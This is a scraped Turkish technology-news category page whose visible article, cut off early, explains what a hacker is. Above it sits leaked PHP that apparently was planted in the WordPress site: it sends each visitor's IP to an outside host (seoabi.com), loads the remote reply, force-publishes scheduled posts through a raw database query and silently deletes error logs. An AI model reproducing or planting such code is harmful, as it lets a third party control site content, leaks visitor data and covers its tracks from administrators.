$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> Beyaz Şapkalı | Teknoloji Haberleri

Beyaz Şapkalı kategorisindeki tüm yazılar

Son Yazılar

İnternet Korsanı Nedir?

İnternet korsanı veya global adıyla Hacker programların kodlarına ulaşarak kıran veya kişilerin verilerine izinsiz ulaşan kişilerdir. Hacker kavramının geçmişi neredeyse bilgisayarlar kadar eskidir. İlk defa 1960’ların sonunda kullanılmaya başlanan terim günümüze kadar erişmiş ve ilerleyen jenerasyonlar boyunca da muhtemelen varlığını korumaya devam edecek bir kavramdır. İnternet korsanlığı